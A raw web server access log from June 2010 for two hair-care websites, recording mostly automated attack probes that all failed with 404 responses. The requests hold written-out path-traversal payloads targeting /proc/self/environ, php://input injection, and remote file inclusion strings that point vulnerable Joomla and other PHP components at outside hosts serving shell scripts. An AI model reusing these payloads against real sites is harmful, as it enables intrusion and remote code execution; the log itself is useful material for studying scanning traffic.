216.14.126.247 - - [28/Jun/2010:09:54:00 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.14.126.247 - - [28/Jun/2010:09:54:00 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
216.14.126.247 - - [28/Jun/2010:09:54:16 -0700] "GET /logs/access_100621.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:01:17 -0700] "GET /logs/access.log/index.php?option=com_rokdownloads&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:01:17 -0700] "GET /index.php?option=com_rokdownloads&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:01:17 -0700] "GET /logs/index.php?option=com_rokdownloads&controller=..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//..//proc/self/environ%0000 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:08:41 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:08:41 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:08:41 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:08:41 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:10:03 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:10:04 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:10:04 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:13:58 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:13:59 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:14:18 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:14:26 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
67.195.37.176 - - [28/Jun/2010:10:16:53 -0700] "GET /logs/access_100614.log HTTP/1.0" 200 3596831 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:10:17:07 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:10:17:07 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "growlonghairfast.com"
207.7.108.242 - - [28/Jun/2010:10:20:37 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
207.7.108.242 - - [28/Jun/2010:10:20:37 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
207.7.108.242 - - [28/Jun/2010:10:20:38 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:07 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:07 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:07 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:08 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:08 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:08 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.69.194.227 - - [28/Jun/2010:10:21:50 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:50 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:50 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:54 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:54 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.69.194.227 - - [28/Jun/2010:10:21:54 -0700] "GET /logs/access_100607.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.dersch.ca/luke/sh/su??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /logs/access_100531.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:21:57 -0700] "GET /logs/access_100531.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:22:18 -0700] "GET /logs/access_100510.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:22:19 -0700] "GET /logs/access_100510.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:22:50 -0700] "POST /logs/access.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:22:50 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:22:50 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:22:55 -0700] "POST /logs/access.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:22:56 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:22:56 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:23:24 -0700] "POST /logs/access_100614.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:24 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.13.138.98 - - [28/Jun/2010:10:23:24 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.bmicg.com/logs/sh/1.pdf???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
85.236.50.166 - - [28/Jun/2010:10:23:24 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:28 -0700] "POST /logs/access_100614.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:28 -0700] "POST /index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:28 -0700] "POST /logs/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:29 -0700] "POST /logs/access_100531.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
85.236.50.166 - - [28/Jun/2010:10:23:33 -0700] "POST /logs/access_100531.log/index.php?site_path=php://input HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:25:04 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:25:04 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:25:05 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
79.244.98.67 - - [28/Jun/2010:10:25:33 -0700] "GET /logs///write_comment_update.php?board_skin_path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
79.244.98.67 - - [28/Jun/2010:10:25:33 -0700] "GET //write_comment_update.php?board_skin_path=http://www.transkonsult.com.ar/test.pdf? HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "growlonghairfast.com"
77.222.56.62 - - [28/Jun/2010:10:25:45 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [28/Jun/2010:10:25:45 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.222.56.62 - - [28/Jun/2010:10:25:51 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:10:27:32 -0700] "GET /index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
67.205.67.73 - - [28/Jun/2010:10:27:32 -0700] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.itsallaboutweb.com/forum/customprofilepics/tes.pdf? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "growlonghairfast.com"
96.32.136.85 - - [28/Jun/2010:10:28:01 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts)" "growlonghairfast.com"
96.32.136.85 - - [28/Jun/2010:10:28:02 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; FunWebProducts)" "growlonghairfast.com"
207.7.108.242 - - [28/Jun/2010:10:29:34 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.222.56.62 - - [28/Jun/2010:10:34:01 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:34:05 -0700] "GET /logs/access_100614.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:34:05 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:34:06 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:34 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:34 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:34 -0700] "GET /logs/access_100329.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:36 -0700] "GET /logs/access_100329.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:36 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:35:36 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:36:33 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:36:33 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:36:33 -0700] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.40.248.210 - - [28/Jun/2010:10:36:59 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:38:16 -0700] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
178.63.27.83 - - [28/Jun/2010:10:38:26 -0700] "GET /logs/access_100125.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:06 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:06 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:06 -0700] "GET /logs/access_100419.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:15 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:15 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:15 -0700] "GET /logs/access_100104.log//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:39:47 -0700] "GET /logs/access_100426.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:40:09 -0700] "GET /appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:40:09 -0700] "GET /logs/access_100419.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:40:09 -0700] "GET /logs//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
97.65.18.158 - - [28/Jun/2010:10:41:07 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.walgifts.com/images/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "growlonghairfast.com"
195.225.170.108 - - [28/Jun/2010:10:41:13 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.walgifts.com/images/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.225.170.108 - - [28/Jun/2010:10:41:13 -0700] "GET /kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=http://www.walgifts.com/images/respon.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
89.238.72.218 - - [28/Jun/2010:10:42:21 -0700] "GET /logs/access_100426.log%20%20//appserv/main.php?appserv_root=http://recky.webs.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.49 - - [28/Jun/2010:10:44:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13080 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:51:34 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:51:34 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
75.125.254.98 - - [28/Jun/2010:10:51:34 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
